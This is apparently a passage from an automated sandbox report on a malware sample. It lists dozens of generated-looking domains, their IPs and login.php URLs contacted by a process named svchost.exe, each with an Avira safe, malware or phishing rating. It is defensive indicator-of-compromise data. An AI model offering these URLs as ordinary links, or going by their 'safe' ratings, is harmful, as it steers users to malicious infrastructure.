    http://qedykiv.com/login.php0%Avira URL Cloudsafe
    http://qedyrag.com/login.php0%Avira URL Cloudsafe
    http://puzylol.com/login.php100%Avira URL Cloudphishing
    http://vocypok.com/login.php100%Avira URL Cloudmalware
    http://lymywaj.com/login.php100%Avira URL Cloudmalware
    http://puvygyv.com/login.php0%Avira URL Cloudsafe
    http://purywoq.com/login.php0%Avira URL Cloudsafe
    http://qetyveq.com/login.php0%Avira URL Cloudsafe
    http://lysyfyj.com/login.php100%Avira URL Cloudmalware
    http://vocyzum.com/login.php100%Avira URL Cloudmalware
    http://volyquk.com/login.php0%Avira URL Cloudsafe
    http://pupywog.com/login.php0%Avira URL Cloudsafe
    http://qedysyp.com/login.php0%Avira URL Cloudsafe
    http://volycem.com/login.php0%Avira URL Cloudsafe
    http://qedyruv.com/login.php0%Avira URL Cloudsafe
    http://ww16.vofycot.com/login.php?sub1=20240908-1659-57ee-a0d6-041620171ba1100%Avira URL Cloudmalware
    http://lyryled.com/100%Avira URL Cloudmalware
    http://puzyduq.com/login.php100%Avira URL Cloudmalware
    http://purywyl.com/login.php0%Avira URL Cloudsafe
    http://vojyzik.com/login.php0%Avira URL Cloudsafe
    http://vojydam.com/login.php100%Avira URL Cloudmalware
    http://gadyciz.com/login.php3100%Avira URL Cloudmalware
    http://pufybyv.com/login.php100%Avira URL Cloudmalware
    http://lyvysur.com/0%Avira URL Cloudsafe
    http://gadyzib.com/100%Avira URL Cloudmalware
    http://lysyxux.com/100%Avira URL Cloudmalware
    http://ganyfes.com/login.php0%Avira URL Cloudsafe
    http://lyryvur.com/login.php100%Avira URL Cloudmalware
    http://pujygug.com/login.php0%Avira URL Cloudsafe
    http://qedyxel.com/login.php0%Avira URL Cloudsafe
    http://puzywag.com/100%Avira URL Cloudmalware
    http://volygyf.com/100%Avira URL Cloudphishing
    http://qebyteg.com/login.php0%Avira URL Cloudsafe
    http://vocydyc.com/login.php0%Avira URL Cloudsafe
    http://gadyneh.com/login.php0%Avira URL Cloudsafe
    http://lykyfen.com/login.php100%Avira URL Cloudmalware
    http://qebykul.com/H0%Avira URL Cloudsafe
    http://lysyxuj.com/login.php0%Avira URL Cloudsafe
    http://lykyxoj.com/login.php0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    pupydeq.com
    		13.248.169.48
    		truetrue
      		unknown
      pupycag.com
      		18.208.156.248
      		truetrue
        		unknown
        lyvyxor.com
        		208.100.26.245
        		truetrue
          		unknown
          77026.bodis.com
          		199.59.243.226
          		truetrue
            		unknown
            lysyvan.com
            		188.114.96.3
            		truetrue
              		unknown
              galynuh.com
              		64.225.91.73
              		truetrue
                		unknown
                qegyhig.com
                		188.114.96.3
                		truetrue
                  		unknown
                  gatyfus.com
                  		178.162.203.226
                  		truetrue
                    		unknown
                    vonypom.com
                    		18.208.156.248
                    		truetrue
                      		unknown
                      puzylyp.com
                      		3.64.163.50
                      		truetrue
                        		unknown
                        qexyhuv.com
                        		15.197.240.20
                        		truetrue
                          		unknown
                          pltraffic7.com
                          		72.52.179.174
                          		truetrue
                            		unknown
                            gadyciz.com
                            		44.221.84.105
                            		truetrue
                              		unknown
                              gadyniw.com
                              		154.212.231.82
                              		truetrue
                                		unknown
                                lyxynyx.com
                                		103.224.212.108
                                		truetrue
                                  		unknown
                                  www.sedoparking.com
                                  		64.190.63.136
                                  		truetrue
                                    		unknown
                                    lygyvuj.com
                                    		52.34.198.229
                                    		truetrue
                                      		unknown
                                      gahyqah.com
                                      		23.253.46.64
                                      		truetrue
                                        		unknown
                                        vocyzit.com
                                        		44.221.84.105
                                        		truetrue
                                          		unknown
                                          galyqaz.com
                                          		199.191.50.83
                                          		truetrue
                                            		unknown
                                            vofycot.com
                                            		103.224.182.252
                                            		truetrue
                                              		unknown
                                              qetyhyg.com
                                              		64.225.91.73
                                              		truetrue
                                                		unknown
                                                vojyqem.com
                                                		3.64.163.50
                                                		truetrue
                                                  		unknown
                                                  gahyhiz.com
                                                  		44.221.84.105
                                                  		truetrue
                                                    		unknown
                                                    qetyfuv.com
                                                    		44.221.84.105
                                                    		truetrue
                                                      		unknown
                                                      9145.searchmagnified.com
                                                      		208.91.196.145
                                                      		truetrue
                                                        		unknown
                                                        lysyfyj.com
                                                        		69.162.80.62
                                                        		truetrue
                                                          		unknown
                                                          gtm-sg-6l13ukk0m05.qu200.com
                                                          		103.150.11.230
                                                          		truetrue
                                                            		unknown
                                                            lymyxid.com
                                                            		3.94.10.34
                                                            		truetrue
                                                              		unknown
                                                              qegyval.com
                                                              		154.85.183.50
                                                              		truetrue
                                                                		unknown
                                                                gatyzoz.com
                                                                		unknown
                                                                		unknowntrue
                                                                  		unknown
                                                                  lykygaj.com
                                                                  		unknown
                                                                  		unknowntrue
                                                                    		unknown
                                                                    qedyxel.com
                                                                    		unknown
                                                                    		unknowntrue
                                                                      		unknown
                                                                      qedyqup.com
                                                                      		unknown
                                                                      		unknowntrue
                                                                        		unknown
                                                                        qekyluv.com
                                                                        		unknown
                                                                        		unknowntrue
                                                                          		unknown
                                                                          gatyrez.com
                                                                          		unknown
                                                                          		unknowntrue
                                                                            		unknown
                                                                            vofybic.com
                                                                            		unknown
                                                                            		unknowntrue
                                                                              		unknown
                                                                              pujydag.com
                                                                              		unknown
                                                                              		unknowntrue
                                                                                		unknown
                                                                                vojykom.com
                                                                                		unknown
                                                                                		unknowntrue
                                                                                  		unknown
                                                                                  qetysuq.com
                                                                                  		unknown
                                                                                  		unknowntrue
                                                                                    		unknown
                                                                                    vonyzut.com
                                                                                    		unknown
                                                                                    		unknowntrue
                                                                                      		unknown
                                                                                      pufyjuq.com
                                                                                      		unknown
                                                                                      		unknowntrue
                                                                                        		unknown
                                                                                        pujytug.com
                                                                                        		unknown
                                                                                        		unknowntrue
                                                                                          		unknown
                                                                                          galyhiw.com
                                                                                          		unknown
                                                                                          		unknowntrue
                                                                                            		unknown
                                                                                            lykygun.com
                                                                                            		unknown
                                                                                            		unknowntrue
                                                                                              		unknown
                                                                                              vopymyc.com
                                                                                              		unknown
                                                                                              		unknowntrue
                                                                                                		unknown
                                                                                                gatyfaz.com
                                                                                                		unknown
                                                                                                		unknowntrue
                                                                                                  		unknown
                                                                                                  vojycit.com
                                                                                                  		unknown
                                                                                                  		unknowntrue
                                                                                                    		unknown
                                                                                                    lyvymej.com
                                                                                                    		unknown
                                                                                                    		unknowntrue
                                                                                                      		unknown
                                                                                                      lygyvar.com
                                                                                                      		unknown
                                                                                                      		unknowntrue
                                                                                                        		unknown
                                                                                                        purygiv.com
                                                                                                        		unknown
                                                                                                        		unknowntrue
                                                                                                          		unknown
                                                                                                          gahykeb.com
                                                                                                          		unknown
                                                                                                          		unknowntrue
                                                                                                            		unknown
                                                                                                            purymog.com
                                                                                                            		unknown
                                                                                                            		unknowntrue
                                                                                                              		unknown
                                                                                                              gadyzib.com
                                                                                                              		unknown
                                                                                                              		unknowntrue
                                                                                                                		unknown
                                                                                                                ganyqow.com
                                                                                                                		unknown
                                                                                                                		unknowntrue
                                                                                                                  		unknown
                                                                                                                  lyxysun.com
                                                                                                                  		unknown
                                                                                                                  		unknowntrue
                                                                                                                    		unknown
                                                                                                                    puzyjyg.com
                                                                                                                    		unknown
                                                                                                                    		unknowntrue
                                                                                                                      		unknown
                                                                                                                      vopydek.com
                                                                                                                      		unknown
                                                                                                                      		unknowntrue
                                                                                                                        		unknown
                                                                                                                        qexyfuq.com
                                                                                                                        		unknown
                                                                                                                        		unknowntrue
                                                                                                                          		unknown
                                                                                                                          gatykyh.com
                                                                                                                          		unknown
                                                                                                                          		unknowntrue
                                                                                                                            		unknown
                                                                                                                            vocykem.com
                                                                                                                            		unknown
                                                                                                                            		unknowntrue
                                                                                                                              		unknown
                                                                                                                              gahynus.com
                                                                                                                              		unknown
                                                                                                                              		unknowntrue
                                                                                                                                		unknown
                                                                                                                                pumypop.com
                                                                                                                                		unknown
                                                                                                                                		unknowntrue
                                                                                                                                  		unknown
                                                                                                                                  lyvysur.com
                                                                                                                                  		unknown
                                                                                                                                  		unknowntrue
                                                                                                                                    		unknown
                                                                                                                                    galypob.com
                                                                                                                                    		unknown
                                                                                                                                    		unknowntrue
                                                                                                                                      		unknown
                                                                                                                                      puzypav.com
                                                                                                                                      		unknown
                                                                                                                                      		unknowntrue
                                                                                                                                        		unknown
                                                                                                                                        gacyqoz.com
                                                                                                                                        		unknown
                                                                                                                                        		unknowntrue
                                                                                                                                          		unknown
                                                                                                                                          lykywid.com
                                                                                                                                          		unknown
                                                                                                                                          		unknowntrue
                                                                                                                                            		unknown
                                                                                                                                            lykytin.com
                                                                                                                                            		unknown
                                                                                                                                            		unknowntrue
                                                                                                                                              		unknown
                                                                                                                                              vofyref.com
                                                                                                                                              		unknown
                                                                                                                                              		unknowntrue
                                                                                                                                                		unknown
                                                                                                                                                qekytig.com
                                                                                                                                                		unknown
                                                                                                                                                		unknowntrue
                                                                                                                                                  		unknown
                                                                                                                                                  vocyzek.com
                                                                                                                                                  		unknown
                                                                                                                                                  		unknowntrue
                                                                                                                                                    		unknown
                                                                                                                                                    puvypoq.com
                                                                                                                                                    		unknown
                                                                                                                                                    		unknowntrue
                                                                                                                                                      		unknown
                                                                                                                                                      puvybeg.com
                                                                                                                                                      		unknown
                                                                                                                                                      		unknowntrue
                                                                                                                                                        		unknown
                                                                                                                                                        pupydig.com
                                                                                                                                                        		unknown
                                                                                                                                                        		unknowntrue
                                                                                                                                                          		unknown
                                                                                                                                                          pupyguq.com
                                                                                                                                                          		unknown
                                                                                                                                                          		unknowntrue
                                                                                                                                                            		unknown
                                                                                                                                                            qedyqal.com
                                                                                                                                                            		unknown
                                                                                                                                                            		unknowntrue
                                                                                                                                                              		unknown
                                                                                                                                                              vowymom.com
                                                                                                                                                              		unknown
                                                                                                                                                              		unknowntrue
                                                                                                                                                                		unknown
                                                                                                                                                                purypol.com
                                                                                                                                                                		unknown
                                                                                                                                                                		unknowntrue
                                                                                                                                                                  		unknown
                                                                                                                                                                  ganypeb.com
                                                                                                                                                                  		unknown
                                                                                                                                                                  		unknowntrue
                                                                                                                                                                    		unknown
                                                                                                                                                                    vopymit.com
                                                                                                                                                                    		unknown
                                                                                                                                                                    		unknowntrue
                                                                                                                                                                      		unknown
                                                                                                                                                                      vowyguf.com
                                                                                                                                                                      		unknown
                                                                                                                                                                      		unknowntrue
                                                                                                                                                                        		unknown
                                                                                                                                                                        pupytiq.com
                                                                                                                                                                        		unknown
                                                                                                                                                                        		unknowntrue
                                                                                                                                                                          		unknown
                                                                                                                                                                          lymyfoj.com
                                                                                                                                                                          		unknown
                                                                                                                                                                          		unknowntrue
                                                                                                                                                                            		unknown
                                                                                                                                                                            vowyzuf.com
                                                                                                                                                                            		unknown
                                                                                                                                                                            		unknowntrue
                                                                                                                                                                              		unknown
                                                                                                                                                                              gatyruw.com
                                                                                                                                                                              		unknown
                                                                                                                                                                              		unknowntrue
                                                                                                                                                                                		unknown
                                                                                                                                                                                qebynyg.com
                                                                                                                                                                                		unknown
                                                                                                                                                                                		unknowntrue
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  puzymev.com
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  		unknowntrue
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    pupymol.com
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    		unknowntrue
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      vojycif.com
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      		unknowntrue
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        qebyvyl.com
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        		unknowntrue
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          lymysan.com
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          		unknowntrue
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            qekynuq.com
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            		unknowntrue
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              puryjil.com
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              		unknowntrue
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                puvytuv.com
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                		unknowntrue
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  galyzus.com
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  		unknowntrue
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    gadyfuh.com
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    		unknowntrue
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      vofycyk.com
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      		unknowntrue
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        lyxywer.com
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        		unknowntrue
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          vojymuk.com
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          		unknowntrue
                                                                                                                                                                                                            		unknown

                                                                                                                                                                                                            Contacted URLs

                                                                                                                                                                                                            NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                            http://lysyfyj.com/login.phptrue
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://ww16.vofycot.com/login.php?sub1=20240908-1659-57ee-a0d6-041620171ba1true
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown

                                                                                                                                                                                                            URLs from Memory and Binaries

                                                                                                                                                                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                            http://volycik.com/login.phpMsvchost.exe, 00000001.00000003.2508205783.000000000724F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2504504034.0000000007239000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505675596.0000000007241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507383572.000000000724E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://puvyjiq.com/http://galyfez.com/http://lyxygur.com/http://puvyjiq.com/http://lygyvon.com/http:svchost.exe, 00000001.00000003.2855136666.000000000BEFA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2855135066.000000000BEFA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2855945770.000000000BEFB000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gatypas.com/login.phpsvchost.exe, 00000001.00000003.2821289704.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2536562321.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2557983438.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2546077981.000000000BE0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qekynog.com/login.phpsvchost.exe, 00000001.00000003.2556595086.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2554327185.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2552572021.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2561801685.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535691969.0000000007345000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lygytyd.com/login.php=svchost.exe, 00000001.00000003.2506872369.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505104494.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508379091.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2504460541.000000000734F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qeqyreq.com/login.phpgsvchost.exe, 00000001.00000003.2477919683.00000000008A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qegytop.com/svchost.exe, 00000001.00000003.2828653969.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2829200303.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2827400393.000000000BE82000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vopycoc.com/login.phpsvchost.exe, 00000001.00000003.2599492010.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2599492010.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2598474329.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612044632.000000000BE0C000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gaqykoz.com/login.phpsvchost.exe, 00000001.00000002.2974667610.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617620564.000000000BEC5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qeqynel.com/login.php8svchost.exe, 00000001.00000003.2799485935.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800682376.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794121889.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800540178.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2791148605.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800431659.00000000072F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qebylyp.com/login.php?svchost.exe, 00000001.00000003.2599492010.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gadycew.com/login.phpsvchost.exe, 00000001.00000003.2819905247.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2532568481.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2823353061.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822601905.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822384079.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2536562321.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2824083108.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2557983438.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2546077981.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2534538085.00000000072F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lyxyvyn.com/login.phpsvchost.exe, 00000001.00000003.2573059018.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2573059018.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lygymod.com/Hsvchost.exe, 00000001.00000003.2590518762.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2585304619.00000000073DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vowyrif.com/login.phpsvchost.exe, 00000001.00000003.2556595086.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2821289704.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2819905247.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2532568481.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2823353061.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2554327185.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822601905.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822384079.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2552572021.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2824083108.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2561801685.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535691969.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2534538085.00000000072F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lyvytud.com/login.phpsvchost.exe, 00000001.00000003.2588996636.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2590376804.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2586469836.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2590187513.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2589232221.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2589741784.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2598911695.0000000007334000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2611837794.0000000007334000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vowydef.com/login.phpsvchost.exe, 00000001.00000003.2711276062.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770480455.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2645801459.000000000BE1D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2646317504.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2701886628.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1762578913.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2708292278.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1771305974.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770976784.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1771501878.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2659316703.000000000724D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2737038256.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1770660444.0000000007204000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2636915993.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1762012054.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2640990048.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2712067298.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qexynyq.com/login.phpsvchost.exe, 00000001.00000003.2854980925.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2621030170.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2860106956.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867102202.000000000BE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2979657667.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2613157948.000000000089F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qeqyxil.com/Hsvchost.exe, 00000001.00000003.2590518762.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2585304619.00000000073DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gadyfys.com/Hsvchost.exe, 00000001.00000003.2590518762.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2585304619.00000000073DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lysyvax.com/login.phpsvchost.exe, 00000001.00000003.2599492010.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2599492010.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612044632.000000000BE0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qedyxel.com/login.php/svchost.exe, 00000001.00000003.2561438521.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2534498249.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2545030147.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://puzytul.com/login.phpsvchost.exe, 00000001.00000003.2859933984.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854943303.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2848730732.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856497680.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837727228.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2577145365.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2581882189.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980543727.00000000072F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
